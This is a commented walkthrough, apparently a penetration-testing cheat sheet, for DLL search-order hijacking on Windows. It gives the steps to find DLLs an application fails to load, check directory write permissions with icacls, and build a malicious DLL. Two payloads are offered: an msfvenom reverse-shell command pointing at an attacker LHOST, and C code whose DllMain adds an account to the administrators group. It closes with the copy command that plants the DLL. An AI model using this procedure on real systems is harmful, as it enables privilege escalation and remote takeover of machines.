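# DLL search-order hijacking: find an application that tries to load a DLL it
# cannot find, drop a DLL of that name into a writable directory earlier in the
# search order, and let the application load it.  Code in the DLL runs with the
# token of the loading process, so this is only a privilege escalation when the
# application itself runs as a higher-privileged account (service/SYSTEM/admin).
#
# Windows searches for DLLs in this order (default, SafeDllSearchMode enabled):
# 1. Directory of the application
# 2. C:\Windows\System32
# 3. C:\Windows\System        (16-bit system directory)
# 4. C:\Windows
# 5. Current directory
# 6. Directories in PATH
# Caveats: DLLs listed under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
# are always loaded from System32 and cannot be hijacked this way, and a load
# that uses a fully qualified path does not go through the search order at all.

# Step 1: Find applications that load missing DLLs
# Use Process Monitor (ProcMon) — filter on:
#   Operation = CreateFile
#   Result    = NAME NOT FOUND
#   Path      ends with .dll
#   Process   = target application
# Note the exact DLL name and the directory where the lookup failed; the first
# failing directory in the order above is where your DLL has to land.

# Step 2: Check if you can write to any of the search-path directories
# Look for (W), (M) or (F) — or (WD)/(AD) in detailed output — granted to
# BUILTIN\Users, Authenticated Users or Everyone.  (OI)(CI) means the grant is
# inherited by files/subfolders created there.
# No trailing backslash before the closing quote: `\"` is parsed as a literal
# quote by icacls, turning the path into `C:\Program Files\TargetApp"`.
icacls "C:\Program Files\TargetApp"
# Also check every directory on PATH, not just the application directory
# (use a single % instead of %% when typing this interactively):
for %%d in ("%PATH:;=" "%") do @icacls %%d
# If writable, place your malicious DLL there

# Step 3: Create malicious DLL (evil.dll)
# The DLL must match the target's architecture (x64 payload for an x64 process);
# for an x86 target use windows/shell_reverse_tcp and a 32-bit build.
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f dll -o missing.dll
# Or write in C:
# BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason, LPVOID lpReserved) {
#     if (ul_reason == DLL_PROCESS_ATTACH) {
#         // system() blocks inside DllMain while the loader lock is held and can
#         // hang or deadlock the process; in a real payload spawn the work from
#         // CreateThread/CreateProcess instead.  The `ram` account must already
#         // exist, and the command only succeeds if the process is admin/SYSTEM.
#         system("cmd.exe /c net localgroup administrators ram /add");
#     }
#     return TRUE;
# }
# If the application resolves imports from the missing DLL (it is in the import
# table, not loaded via LoadLibrary), your DLL must export the same function
# names or the process fails to start — use forwarders/proxying to the real DLL.

# Step 4: Copy DLL to hijack location and trigger the app
copy evil.dll "C:\Program Files\TargetApp\missing.dll"
# Restart the app or wait for the next load — the DLL runs with the process's
# privilege level (the application's token, not yours).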